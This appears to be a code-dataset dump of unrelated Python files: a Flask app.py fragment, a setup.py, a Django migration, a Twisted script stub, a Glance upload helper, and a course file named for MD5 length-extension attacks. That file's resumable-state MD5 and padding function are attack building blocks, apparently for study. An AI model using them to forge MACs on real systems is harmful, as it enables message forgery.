if e.args[0] not in description:
e.description = "KeyError: '{}'".format(*e.args)
else:
# Werkzeug >= 0.15 does add it, remove it in production
e.args = ()
if isinstance(e, HTTPException) and not self.trap_http_exception(e):
return self.handle_http_exception(e)
handler = self._find_error_handler(e)
if handler is None:
reraise(exc_type, exc_value, tb)
return handler(e)
def handle_exception(self, e):
"""Default exception handling that kicks in when an exception
occurs that is not caught. In debug mode the exception will
be re-raised immediately, otherwise it is logged and the handler
for a 500 internal server error is used. If no such handler
exists, a default 500 internal server error message is displayed.
.. versionadded:: 0.3
"""
exc_type, exc_value, tb = sys.exc_info()
got_request_exception.send(self, exception=e)
handler = self._find_error_handler(InternalServerError())
if self.propagate_exceptions:
# if we want to repropagate the exception, we can attempt to
# raise it with the whole traceback in case we can do that
# (the function was actually called from the except part)
# otherwise, we just raise the error again
if exc_value is e:
reraise(exc_type, exc_value, tb)
else:
raise e
self.log_exception((exc_type, exc_value, tb))
if handler is None:
return InternalServerError()
return self.finalize_request(handler(e), from_error_handler=True)
def log_exception(self, exc_info):
"""Logs an exception. This is called by :meth:`handle_exception`
if debugging is disabled and right before the handler is called.
The default implementation logs the exception as error on the
:attr:`logger`.
.. versionadded:: 0.8
"""
self.logger.error('Exception on %s [%s]' % (
request.path,
request.method
), exc_info=exc_info)
def raise_routing_exception(self, request):
"""Exceptions that are recording during routing are reraised with
this method. During debug we are not reraising redirect requests
for non ``GET``, ``HEAD``, or ``OPTIONS`` requests and we're raising
a different error instead to help debug situations.
:internal:
"""
if not self.debug \
or not isinstance(request.routing_exception, RequestRedirect) \
or request.method in ('GET', 'HEAD', 'OPTIONS'):
raise request.routing_exception
from .debughelpers import FormDataRoutingRedirect
raise FormDataRoutingRedirect(request)
def dispatch_request(self):
"""Does the request dispatching. Matches the URL and returns the
return value of the view or error handler. This does not have to
be a response object. In order to convert the return value to a
proper response object, call :func:`make_response`.
.. versionchanged:: 0.7
This no longer does the exception handling, this code was
moved to the new :meth:`full_dispatch_request`.
"""
req = _request_ctx_stack.top.request
if req.routing_exception is not None:
self.raise_routing_exception(req)
rule = req.url_rule
# if we provide automatic options for this URL and the
# request came with the OPTIONS method, reply automatically
if getattr(rule, 'provide_automatic_options', False) \
and req.method == 'OPTIONS':
return self.make_default_options_response()
# otherwise dispatch to the handler for that endpoint
return self.view_functions[rule.endpoint](**req.view_args)
def full_dispatch_request(self):
"""Dispatches the request and on top of that performs request
pre and postprocessing as well as HTTP exception catching and
error handling.
.. versionadded:: 0.7
"""
self.try_trigger_before_first_request_functions()
try:
request_started.send(self)
rv = self.preprocess_request()
if rv is None:
rv = self.dispatch_request()
except Exception as e:
rv = self.handle_user_exception(e)
return self.finalize_request(rv)
def finalize_request(self, rv, from_error_handler=False):
"""Given the return value from a view function this finalizes
the request by converting it into a response and invoking the
postprocessing functions. This is invoked for both normal
request dispatching as well as error handlers.
Because this means that it might be called as a result of a
failure a special safe mode is available which can be enabled
with the `from_error_handler` flag. If enabled, failures in
response processing will be logged and otherwise ignored.
:internal:
"""
response = self.make_response(rv)
try:
response = self.process_response(response)
request_finished.send(self, response=response)
except Exception:
if not from_error_handler:
raise
self.logger.exception('Request finalizing failed with an '
'error while handling an error')
return response
def try_trigger_before_first_request_functions(self):
"""Called before each request and will ensure that it triggers
the :attr:`before_first_request_funcs` and only exactly once per
application instance (which means process usually).
:internal:
"""
if self._got_first_request:
return
with self._before_request_lock:
if self._got_first_request:
return
for func in self.before_first_request_funcs:
func()
self._got_first_request = True
def make_default_options_response(self):
"""This method is called to create the default ``OPTIONS`` response.
This can be changed through subclassing to change the default
behavior of ``OPTIONS`` responses.
.. versionadded:: 0.7
"""
adapter = _request_ctx_stack.top.url_adapter
if hasattr(adapter, 'allowed_methods'):
methods = adapter.allowed_methods()
else:
# fallback for Werkzeug < 0.7
methods = []
try:
adapter.match(method='--')
except MethodNotAllowed as e:
methods = e.valid_methods
except HTTPException as e:
pass
rv = self.response_class()
rv.allow.update(methods)
return rv
def should_ignore_error(self, error):
"""This is called to figure out if an error should be ignored
or not as far as the teardown system is concerned. If this
function returns ``True`` then the teardown handlers will not be
passed the error.
.. versionadded:: 0.10
"""
return False
def make_response(self, rv):
"""Convert the return value from a view function to an instance of
:attr:`response_class`.
:param rv: the return value from the view function. The view function
must return a response. Returning ``None``, or the view ending
without returning, is not allowed. The following types are allowed
for ``view_rv``:
``str`` (``unicode`` in Python 2)
A response object is created with the string encoded to UTF-8
as the body.
``bytes`` (``str`` in Python 2)
A response object is created with the bytes as the body.
``tuple``
Either ``(body, status, headers)``, ``(body, status)``, or
``(body, headers)``, where ``body`` is any of the other types
allowed here, ``status`` is a string or an integer, and
``headers`` is a dictionary or a list of ``(key, value)``
tuples. If ``body`` is a :attr:`response_class` instance,
``status`` overwrites the exiting value and ``headers`` are
extended.
:attr:`response_class`
The object is returned unchanged.
other :class:`~werkzeug.wrappers.Response` class
The object is coerced to :attr:`response_class`.
:func:`callable`
The function is called as a WSGI application. The result is
used to create a response object.
.. versionchanged:: 0.9
Previously a tuple was interpreted as the arguments for the
response object.
"""
status = headers = None
# unpack tuple returns
if isinstance(rv, tuple):
len_rv = len(rv)
# a 3-tuple is unpacked directly
if len_rv == 3:
rv, status, headers = rv
# decide if a 2-tuple has status or headers
elif len_rv == 2:
if isinstance(rv[1], (Headers, dict, tuple, list)):
rv, headers = rv
else:
rv, status = rv
# other sized tuples are not allowed
else:
raise TypeError(
'The view function did not return a valid response tuple.'
' The tuple must have the form (body, status, headers),'
' (body, status), or (body, headers).'
)
# the body must not be None
if rv is None:
raise TypeError(
'The view function did not return a valid response. The'
' function either returned None or ended without a return'
' statement.'
)
# make sure the body is an instance of the response class
if not isinstance(rv, self.response_class):
if isinstance(rv, (text_type, bytes, bytearray)):
# let the response class set the status and headers instead of
# waiting to do it manually, so that the class can handle any
# special logic
rv = self.response_class(rv, status=status, headers=headers)
status = headers = None
else:
# evaluate a WSGI callable, or coerce a different response
# class to the correct type
try:
rv = self.response_class.force_type(rv, request.environ)
except TypeError as e:
new_error = TypeError(
'{e}\nThe view function did not return a valid'
' response. The return type must be a string, tuple,'
' Response instance, or WSGI callable, but it was a'
' {rv.__class__.__name__}.'.format(e=e, rv=rv)
)
reraise(TypeError, new_error, sys.exc_info()[2])
# prefer the status if it was provided
if status is not None:
if isinstance(status, (text_type, bytes, bytearray)):
rv.status = status
else:
rv.status_code = status
# extend existing headers with provided headers
if headers:
rv.headers.extend(headers)
return rv
def create_url_adapter(self, request):
"""Creates a URL adapter for the given request. The URL adapter
is created at a point where the request context is not yet set
up so the request is passed explicitly.
.. versionadded:: 0.6
.. versionchanged:: 0.9
This can now also be called without a request object when the
URL adapter is created for the application context.
.. versionchanged:: 1.0
:data:`SERVER_NAME` no longer implicitly enables subdomain
matching. Use :attr:`subdomain_matching` instead.
"""
if request is not None:
# If subdomain matching is disabled (the default), use the
# default subdomain in all cases. This should be the default
# in Werkzeug but it currently does not have that feature.
subdomain = ((self.url_map.default_subdomain or None)
if not self.subdomain_matching else None)
return self.url_map.bind_to_environ(
request.environ,
server_name=self.config['SERVER_NAME'],
subdomain=subdomain)
# We need at the very least the server name to be set for this
# to work.
if self.config['SERVER_NAME'] is not None:
return self.url_map.bind(
self.config['SERVER_NAME'],
script_name=self.config['APPLICATION_ROOT'],
url_scheme=self.config['PREFERRED_URL_SCHEME'])
def inject_url_defaults(self, endpoint, values):
"""Injects the URL defaults for the given endpoint directly into
the values dictionary passed. This is used internally and
automatically called on URL building.
.. versionadded:: 0.7
"""
funcs = self.url_default_functions.get(None, ())
if '.' in endpoint:
bp = endpoint.rsplit('.', 1)[0]
funcs = chain(funcs, self.url_default_functions.get(bp, ()))
for func in funcs:
func(endpoint, values)
def handle_url_build_error(self, error, endpoint, values):
"""Handle :class:`~werkzeug.routing.BuildError` on :meth:`url_for`.
"""
exc_type, exc_value, tb = sys.exc_info()
for handler in self.url_build_error_handlers:
try:
rv = handler(error, endpoint, values)
if rv is not None:
return rv
except BuildError as e:
# make error available outside except block (py3)
error = e
# At this point we want to reraise the exception. If the error is
# still the same one we can reraise it with the original traceback,
# otherwise we raise it from here.
if error is exc_value:
reraise(exc_type, exc_value, tb)
raise error
def preprocess_request(self):
"""Called before the request is dispatched. Calls
:attr:`url_value_preprocessors` registered with the app and the
current blueprint (if any). Then calls :attr:`before_request_funcs`
registered with the app and the blueprint.
If any :meth:`before_request` handler returns a non-None value, the
value is handled as if it was the return value from the view, and
further request handling is stopped.
"""
bp = _request_ctx_stack.top.request.blueprint
funcs = self.url_value_preprocessors.get(None, ())
if bp is not None and bp in self.url_value_preprocessors:
funcs = chain(funcs, self.url_value_preprocessors[bp])
for func in funcs:
func(request.endpoint, request.view_args)
funcs = self.before_request_funcs.get(None, ())
if bp is not None and bp in self.before_request_funcs:
funcs = chain(funcs, self.before_request_funcs[bp])
for func in funcs:
rv = func()
if rv is not None:
return rv
def process_response(self, response):
"""Can be overridden in order to modify the response object
before it's sent to the WSGI server. By default this will
call all the :meth:`after_request` decorated functions.
.. versionchanged:: 0.5
As of Flask 0.5 the functions registered for after request
execution are called in reverse order of registration.
:param response: a :attr:`response_class` object.
:return: a new response object or the same, has to be an
instance of :attr:`response_class`.
"""
ctx = _request_ctx_stack.top
bp = ctx.request.blueprint
funcs = ctx._after_request_functions
if bp is not None and bp in self.after_request_funcs:
funcs = chain(funcs, reversed(self.after_request_funcs[bp]))
if None in self.after_request_funcs:
funcs = chain(funcs, reversed(self.after_request_funcs[None]))
for handler in funcs:
response = handler(response)
if not self.session_interface.is_null_session(ctx.session):
self.session_interface.save_session(self, ctx.session, response)
return response
def do_teardown_request(self, exc=_sentinel):
"""Called after the request is dispatched and the response is
returned, right before the request context is popped.
This calls all functions decorated with
:meth:`teardown_request`, and :meth:`Blueprint.teardown_request`
if a blueprint handled the request. Finally, the
:data:`request_tearing_down` signal is sent.
This is called by
:meth:`RequestContext.pop() <flask.ctx.RequestContext.pop>`,
which may be delayed during testing to maintain access to
resources.
:param exc: An unhandled exception raised while dispatching the
request. Detected from the current exception information if
not passed. Passed to each teardown function.
.. versionchanged:: 0.9
Added the ``exc`` argument.
"""
if exc is _sentinel:
exc = sys.exc_info()[1]
funcs = reversed(self.teardown_request_funcs.get(None, ()))
bp = _request_ctx_stack.top.request.blueprint
if bp is not None and bp in self.teardown_request_funcs:
funcs = chain(funcs, reversed(self.teardown_request_funcs[bp]))
for func in funcs:
func(exc)
request_tearing_down.send(self, exc=exc)
def do_teardown_appcontext(self, exc=_sentinel):
"""Called right before the application context is popped.
When handling a request, the application context is popped
after the request context. See :meth:`do_teardown_request`.
This calls all functions decorated with
:meth:`teardown_appcontext`. Then the
:data:`appcontext_tearing_down` signal is sent.
This is called by
:meth:`AppContext.pop() <flask.ctx.AppContext.pop>`.
.. versionadded:: 0.9
"""
if exc is _sentinel:
exc = sys.exc_info()[1]
for func in reversed(self.teardown_appcontext_funcs):
func(exc)
appcontext_tearing_down.send(self, exc=exc)
def app_context(self):
"""Create an :class:`~flask.ctx.AppContext`. Use as a ``with``
block to push the context, which will make :data:`current_app`
point at this application.
An application context is automatically pushed by
:meth:`RequestContext.push() <flask.ctx.RequestContext.push>`
when handling a request, and when running a CLI command. Use
this to manually create a context outside of these situations.
::
with app.app_context():
init_db()
See :doc:`/appcontext`.
.. versionadded:: 0.9
"""
return AppContext(self)
def request_context(self, environ):
"""Create a :class:`~flask.ctx.RequestContext` representing a
WSGI environment. Use a ``with`` block to push the context,
which will make :data:`request` point at this request.
See :doc:`/reqcontext`.
Typically you should not call this from your own code. A request
context is automatically pushed by the :meth:`wsgi_app` when
handling a request. Use :meth:`test_request_context` to create
an environment and context instead of this method.
:param environ: a WSGI environment
"""
return RequestContext(self, environ)
def test_request_context(self, *args, **kwargs):
"""Create a :class:`~flask.ctx.RequestContext` for a WSGI
environment created from the given values. This is mostly useful
during testing, where you may want to run a function that uses
request data without dispatching a full request.
See :doc:`/reqcontext`.
Use a ``with`` block to push the context, which will make
:data:`request` point at the request for the created
environment. ::
with test_request_context(...):
generate_report()
When using the shell, it may be easier to push and pop the
context manually to avoid indentation. ::
ctx = app.test_request_context(...)
ctx.push()
...
ctx.pop()
Takes the same arguments as Werkzeug's
:class:`~werkzeug.test.EnvironBuilder`, with some defaults from
the application. See the linked Werkzeug docs for most of the
available arguments. Flask-specific behavior is listed here.
:param path: URL path being requested.
:param base_url: Base URL where the app is being served, which
``path`` is relative to. If not given, built from
:data:`PREFERRED_URL_SCHEME`, ``subdomain``,
:data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`.
:param subdomain: Subdomain name to append to
:data:`SERVER_NAME`.
:param url_scheme: Scheme to use instead of
:data:`PREFERRED_URL_SCHEME`.
:param data: The request body, either as a string or a dict of
form keys and values.
:param json: If given, this is serialized as JSON and passed as
``data``. Also defaults ``content_type`` to
``application/json``.
:param args: other positional arguments passed to
:class:`~werkzeug.test.EnvironBuilder`.
:param kwargs: other keyword arguments passed to
:class:`~werkzeug.test.EnvironBuilder`.
"""
from flask.testing import make_test_environ_builder
builder = make_test_environ_builder(self, *args, **kwargs)
try:
return self.request_context(builder.get_environ())
finally:
builder.close()
def wsgi_app(self, environ, start_response):
"""The actual WSGI application. This is not implemented in
:meth:`__call__` so that middlewares can be applied without
losing a reference to the app object. Instead of doing this::
app = MyMiddleware(app)
It's a better idea to do this instead::
app.wsgi_app = MyMiddleware(app.wsgi_app)
Then you still have the original application object around and
can continue to call methods on it.
.. versionchanged:: 0.7
Teardown events for the request and app contexts are called
even if an unhandled error occurs. Other events may not be
called depending on when an error occurs during dispatch.
See :ref:`callbacks-and-errors`.
:param environ: A WSGI environment.
:param start_response: A callable accepting a status code,
a list of headers, and an optional exception context to
start the response.
"""
ctx = self.request_context(environ)
error = None
try:
try:
ctx.push()
response = self.full_dispatch_request()
except Exception as e:
error = e
response = self.handle_exception(e)
except:
error = sys.exc_info()[1]
raise
return response(environ, start_response)
finally:
if self.should_ignore_error(error):
error = None
ctx.auto_pop(error)
def __call__(self, environ, start_response):
"""The WSGI server calls the Flask application object as the
WSGI application. This calls :meth:`wsgi_app` which can be
wrapped to applying middleware."""
return self.wsgi_app(environ, start_response)
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.name,
)
| [
"[email protected]"
] | |
3daa552b34b92a1091491956c4ea13bf7738ada2 | c48a8d16b609f51ec28ce735d69b3e71480d5fe3 | /setup.py | bd5d830002ab82263ac25476fc7a82022a8d8806 | [] | no_license | arii/pyrltools | c6d622761b7868a72e60c6cb5d35dbae2de1ffe1 | 45df3ecd4227529f3ce40fc9132c5dc42920fc5c | refs/heads/master | 2021-01-18T05:00:58.103484 | 2014-10-16T00:18:14 | 2014-10-16T00:18:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | #from numpy.distutils.core import setup, Extension
from setuptools import setup, Extension, find_packages
import numpy
setup(name = 'rltools',
version = '0.1',
include_dirs=[numpy.get_include(), '/usr/include'],
packages = find_packages())
| [
"[email protected]"
] | |
15b30860d116d827c4c3de9db43e689dffc3d70f | 6c6531b6f93817a2720ff9b78fce6ad4d5bb500c | /PericiasMedicas/company/migrations/0007_auto_20191230_1711.py | 5603642c2f74d64ccb13c8e644b23e6a6f6f2902 | [] | no_license | massariolmc/periciasmedicas | 6d3c142a5f5e308b049d57b30d698526c8aecda3 | 9b5b0e192bf51bb1b297f0983b2a0ab0c24b31b1 | refs/heads/master | 2022-12-08T11:13:10.981476 | 2020-02-21T23:32:44 | 2020-02-21T23:32:44 | 235,667,801 | 0 | 0 | null | 2022-11-22T05:15:44 | 2020-01-22T21:12:16 | JavaScript | UTF-8 | Python | false | false | 472 | py | # Generated by Django 2.2.7 on 2019-12-30 21:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('company', '0006_auto_20191230_1629'),
]
operations = [
migrations.AlterField(
model_name='company',
name='state_registration',
field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='Inscrição Estadual'),
),
]
| [
"[email protected]"
] | |
b03184fca3a98c1dcef9e6620aab908a13251857 | c883f6029e05bffa8b34795d017bdcd2975fdc31 | /venv/Scripts/conch-script.py | 103a4e88c1d8e9ad5f3b7b6a22e01b2a6baec516 | [] | no_license | Solin1998/AnalyzeGdeltData | be54ee71db375dc70b9da7f067215adb4c44f2d4 | 0e2e340fbbb1af4708edce11e034ccd0ee9c0e4d | refs/heads/master | 2020-05-15T17:21:04.497117 | 2019-05-16T01:53:30 | 2019-05-16T01:53:30 | 182,401,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | #!D:\scrapy_gdelt\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'Twisted==19.2.0','console_scripts','conch'
__requires__ = 'Twisted==19.2.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('Twisted==19.2.0', 'console_scripts', 'conch')()
)
| [
"[email protected]"
] | |
6035dce05ab1ceb238455998bedfa82823ff466e | 3471728291ab015e6780763218f96a369897f5c4 | /imagefactory_plugins/OpenStack/glance_upload.py | c2b28347f49d65700b6205043a0e6637b27930f4 | [
"Apache-2.0"
] | permissive | zyga/imagefactory | 913fb4a987a746cff72f3074e0e338e896ac2e65 | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | refs/heads/master | 2020-03-24T07:33:43.270977 | 2018-06-26T19:37:55 | 2018-06-26T19:37:55 | 142,568,326 | 1 | 0 | Apache-2.0 | 2018-07-27T11:20:36 | 2018-07-27T11:20:36 | null | UTF-8 | Python | false | false | 1,452 | py | # Copyright 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from glance import client as glance_client
from pprint import pprint
def glance_upload(image_filename, creds = {'auth_url': None, 'password': None, 'strategy': 'noauth', 'tenant': None, 'username': None},
host = "0.0.0.0", port = "9292", token = None):
image_meta = {'container_format': 'bare',
'disk_format': 'qcow2',
'is_public': True,
'min_disk': 0,
'min_ram': 0,
'name': 'Factory Test Image',
'properties': {'distro': 'rhel'}}
c = glance_client.Client(host=host, port=port,
auth_tok=token, creds=creds)
image_data = open(image_filename, "r")
image_meta = c.add_image(image_meta, image_data)
image_data.close()
return image_meta['id']
image_id = glance_upload("/root/base-image-f19e3f9b-5905-4b66-acb2-2e25395fdff7.qcow2")
print image_id
| [
"[email protected]"
] | |
1946bfe1caf51887dc9a1fb940cb12a1a1f3c769 | 11424be5ccc50cef7b421c01be8fbdf0e9a6df16 | /AY2021/attacks/LengthExtension/live/length_extension_md5_live.py | b1d6612a6e266c2a7a2ee96f65c26065210df06b | [] | no_license | MarcoSapio/cryptography-03lpyov-exercises | 1ff7b6e189af9bc4af4a85690b1f3ecbcb96527d | b9234c3a88f6e43def61fcad4acbfcc3ced03068 | refs/heads/master | 2023-05-27T00:25:46.641506 | 2021-06-10T14:08:40 | 2021-06-10T14:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,288 | py | #!/usr/bin/env python3
#
# Derived from:
#
# MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm
#
# Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
# rights reserved.
#
# License to copy and use this software is granted provided that it
# is identified as the "RSA Data Security, Inc. MD5 Message-Digest
# Algorithm" in all material mentioning or referencing this software
# or this function.
#
# License is also granted to make and use derivative works provided
# that such works are identified as "derived from the RSA Data
# Security, Inc. MD5 Message-Digest Algorithm" in all material
# mentioning or referencing the derived work.
#
# RSA Data Security, Inc. makes no representations concerning either
# the merchantability of this software or the suitability of this
# software for any particular purpose. It is provided "as is"
# without express or implied warranty of any kind.
#
# These notices must be retained in any copies of any part of this
# documentation and/or software.
__doc__ = """pymd5 module - The MD5 hash function in pure Python.
md5(string='', state=None, count=0) - Returns a new md5 objects and
processes string. Optional advanced parameters allow you to
resume an earlier computation by setting the internal state of
the function and the counter of message bits processed so far.
Most of the interface matches Python's standard hashlib.
md5 objects have these methods and attributes:
- update(arg): Update the md5 object with the string arg. Repeated calls
are equivalent to a single call with the concatenation of all
the arguments.
- digest(): Return the digest of the strings passed to the update() method
so far. This may contain non-ASCII characters, including
NUL bytes.
- hexdigest(): Like digest() except the digest is returned as a string of
double length, containing only hexadecimal digits.
- digest_size: The size of the resulting hash in bytes (16).
- block_size: The internal block size of the hash algorithm in bytes (64).
For example, to obtain the digest of the string 'Nobody inspects the
spammish repetition':
>>> import pymd5
>>> m = pymd5.md5()
>>> m.update("Nobody inspects")
>>> m.update(" the spammish repetition")
>>> m.digest()
More condensed:
>>> pymd5.md5("Nobody inspects the spammish repetition").hexdigest()
'bb649c83dd1ea5c9d9dec9a18df0ffe9'
The module also exposes two low-level methods to help with crypto
experiments:
- md5_compress(state, block): The MD5 compression function; returns a
new 16-byte state based on the 16-byte
previous state and a 512-byte message
block.
- padding(msg_bits): Generate the padding that should be appended
to the end of a message of the given size to
reach a multiple of the block size.
"""
# Constants for compression function.
S11 = 7
S12 = 12
S13 = 17
S14 = 22
S21 = 5
S22 = 9
S23 = 14
S24 = 20
S31 = 4
S32 = 11
S33 = 16
S34 = 23
S41 = 6
S42 = 10
S43 = 15
S44 = 21
PADDING = b"\x80" + 63 * b"\0"
# F, G, H and I: basic MD5 functions.
def F(x, y, z): return (((x) & (y)) | ((~x) & (z)))
def G(x, y, z): return (((x) & (z)) | ((y) & (~z)))
def H(x, y, z): return ((x) ^ (y) ^ (z))
def I(x, y, z): return ((y) ^ ((x) | (~z)))
def ROTATE_LEFT(x, n):
x = x & 0xffffffff # make shift unsigned
return (((x) << (n)) | ((x) >> (32 - (n)))) & 0xffffffff
# FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
# Rotation is separate from addition to prevent recomputation.
def FF(a, b, c, d, x, s, ac):
a = a + F((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
def GG(a, b, c, d, x, s, ac):
a = a + G((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
def HH(a, b, c, d, x, s, ac):
a = a + H((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
def II(a, b, c, d, x, s, ac):
a = a + I((b), (c), (d)) + (x) + (ac)
a = ROTATE_LEFT((a), (s))
a = a + b
return a # must assign this to a
class md5(object):
digest_size = 16 # size of the resulting hash in bytes
block_size = 64 # hash algorithm's internal block size
def __init__(self, string='', state=None, count=0):
"""md5(string='', state=None, count=0) - Return a new md5
hash object, optionally initialized to a given internal state
and count of message bits processed so far, then processes
string.
"""
self.count = 0
self.buffer = b""
if state is None:
# initial state defined by standard
self.state = (0x67452301,
0xefcdab89,
0x98badcfe,
0x10325476,) #128 bits ~ msg digest size
else:
self.state = _decode(state, md5.digest_size)
if count is not None:
self.count = count
if string:
self.update(string)
def update(self, input):
"""update(input) - Update the md5 object with the string
arg. Repeated calls are equivalent to a single call with the
concatenation of all the arguments.
"""
if not isinstance(input, bytes):
input = input.encode('utf-8')
inputLen = len(input)
index = int(self.count >> 3) & 0x3F
self.count = self.count + (inputLen << 3) # update number of bits
partLen = md5.block_size - index
# apply compression function to as many blocks as we have
if inputLen >= partLen:
self.buffer = self.buffer[:index] + input[:partLen]
self.state = md5_compress(self.state, self.buffer)
i = partLen
while i + 63 < inputLen:
self.state = md5_compress(self.state, input[i:i + md5.block_size])
i = i + md5.block_size
index = 0
else:
i = 0
# buffer remaining output
self.buffer = self.buffer[:index] + input[i:inputLen]
def digest(self):
"""digest() - Return the MD5 hash of the strings passed to the
update() method so far. This is a string of digest_size bytes
which may contain non-ASCII characters, including null bytes.
"""
_buffer, _count, _state = self.buffer, self.count, self.state
self.update(padding(self.count))
result = self.state
self.buffer, self.count, self.state = _buffer, _count, _state
return _encode(result, md5.digest_size)
def hexdigest(self):
"""hexdigest() - Like digest() except the hash value is
returned as a string of hexadecimal digits.
"""
return self.digest().hex()
## end of class
def padding(msg_bits):
"""padding(msg_bits) - Generates the padding that should be
appended to the end of a message of the given size to reach
a multiple of the block size."""
index = int((msg_bits >> 3) & 0x3f)
if index < 56:
padLen = (56 - index)
else:
padLen = (120 - index)
# (the last 8 bytes store the number of bits in the message)
return PADDING[:padLen] + _encode((msg_bits & 0xffffffff, msg_bits >> 32), 8)
def md5_compress(state, block):
"""md5_compress(state, block) - The MD5 compression function.
Outputs a 16-byte state based on a 16-byte previous state and a
512-byte message block.
"""
a, b, c, d = state
x = _decode(block, md5.block_size)
# Round
a = FF(a, b, c, d, x[0], S11, 0xd76aa478) # 1
d = FF(d, a, b, c, x[1], S12, 0xe8c7b756) # 2
c = FF(c, d, a, b, x[2], S13, 0x242070db) # 3
b = FF(b, c, d, a, x[3], S14, 0xc1bdceee) # 4
a = FF(a, b, c, d, x[4], S11, 0xf57c0faf) # 5
d = FF(d, a, b, c, x[5], S12, 0x4787c62a) # 6
c = FF(c, d, a, b, x[6], S13, 0xa8304613) # 7
b = FF(b, c, d, a, x[7], S14, 0xfd469501) # 8
a = FF(a, b, c, d, x[8], S11, 0x698098d8) # 9
d = FF(d, a, b, c, x[9], S12, 0x8b44f7af) # 10
c = FF(c, d, a, b, x[10], S13, 0xffff5bb1) # 11
b = FF(b, c, d, a, x[11], S14, 0x895cd7be) # 12
a = FF(a, b, c, d, x[12], S11, 0x6b901122) # 13
d = FF(d, a, b, c, x[13], S12, 0xfd987193) # 14
c = FF(c, d, a, b, x[14], S13, 0xa679438e) # 15
b = FF(b, c, d, a, x[15], S14, 0x49b40821) # 16
# Round 2
a = GG(a, b, c, d, x[1], S21, 0xf61e2562) # 17
d = GG(d, a, b, c, x[6], S22, 0xc040b340) # 18
c = GG(c, d, a, b, x[11], S23, 0x265e5a51) # 19
b = GG(b, c, d, a, x[0], S24, 0xe9b6c7aa) # 20
a = GG(a, b, c, d, x[5], S21, 0xd62f105d) # 21
d = GG(d, a, b, c, x[10], S22, 0x2441453) # 22
c = GG(c, d, a, b, x[15], S23, 0xd8a1e681) # 23
b = GG(b, c, d, a, x[4], S24, 0xe7d3fbc8) # 24
a = GG(a, b, c, d, x[9], S21, 0x21e1cde6) # 25
d = GG(d, a, b, c, x[14], S22, 0xc33707d6) # 26
c = GG(c, d, a, b, x[3], S23, 0xf4d50d87) # 27
b = GG(b, c, d, a, x[8], S24, 0x455a14ed) # 28
a = GG(a, b, c, d, x[13], S21, 0xa9e3e905) # 29
d = GG(d, a, b, c, x[2], S22, 0xfcefa3f8) # 30
c = GG(c, d, a, b, x[7], S23, 0x676f02d9) # 31
b = GG(b, c, d, a, x[12], S24, 0x8d2a4c8a) # 32
# Round 3
a = HH(a, b, c, d, x[5], S31, 0xfffa3942) # 33
d = HH(d, a, b, c, x[8], S32, 0x8771f681) # 34
c = HH(c, d, a, b, x[11], S33, 0x6d9d6122) # 35
b = HH(b, c, d, a, x[14], S34, 0xfde5380c) # 36
a = HH(a, b, c, d, x[1], S31, 0xa4beea44) # 37
d = HH(d, a, b, c, x[4], S32, 0x4bdecfa9) # 38
c = HH(c, d, a, b, x[7], S33, 0xf6bb4b60) # 39
b = HH(b, c, d, a, x[10], S34, 0xbebfbc70) # 40
a = HH(a, b, c, d, x[13], S31, 0x289b7ec6) # 41
d = HH(d, a, b, c, x[0], S32, 0xeaa127fa) # 42
c = HH(c, d, a, b, x[3], S33, 0xd4ef3085) # 43
b = HH(b, c, d, a, x[6], S34, 0x4881d05) # 44
a = HH(a, b, c, d, x[9], S31, 0xd9d4d039) # 45
d = HH(d, a, b, c, x[12], S32, 0xe6db99e5) # 46
c = HH(c, d, a, b, x[15], S33, 0x1fa27cf8) # 47
b = HH(b, c, d, a, x[2], S34, 0xc4ac5665) # 48
# Round 4
a = II(a, b, c, d, x[0], S41, 0xf4292244) # 49
d = II(d, a, b, c, x[7], S42, 0x432aff97) # 50
c = II(c, d, a, b, x[14], S43, 0xab9423a7) # 51
b = II(b, c, d, a, x[5], S44, 0xfc93a039) # 52
a = II(a, b, c, d, x[12], S41, 0x655b59c3) # 53
d = II(d, a, b, c, x[3], S42, 0x8f0ccc92) # 54
c = II(c, d, a, b, x[10], S43, 0xffeff47d) # 55
b = II(b, c, d, a, x[1], S44, 0x85845dd1) # 56
a = II(a, b, c, d, x[8], S41, 0x6fa87e4f) # 57
d = II(d, a, b, c, x[15], S42, 0xfe2ce6e0) # 58
c = II(c, d, a, b, x[6], S43, 0xa3014314) # 59
b = II(b, c, d, a, x[13], S44, 0x4e0811a1) # 60
a = II(a, b, c, d, x[4], S41, 0xf7537e82) # 61
d = II(d, a, b, c, x[11], S42, 0xbd3af235) # 62
c = II(c, d, a, b, x[2], S43, 0x2ad7d2bb) # 63
b = II(b, c, d, a, x[9], S44, 0xeb86d391) # 64
return (0xffffffff & (state[0] + a),
0xffffffff & (state[1] + b),
0xffffffff & (state[2] + c),
0xffffffff & (state[3] + d),)
import struct, string
def _encode(input, len):
k = len // 4
res = struct.pack("<%iI" % k, *(list(input[:k])))
return res
def _decode(input, len):
k = len // 4
res = struct.unpack("<%iI" % k, input[:len])
return list(res)
def test(input=""):
"""test(input): displays results of input hashed with our md5
function and the standard Python hashlib implementation
"""
print(md5(input).hexdigest())
import hashlib
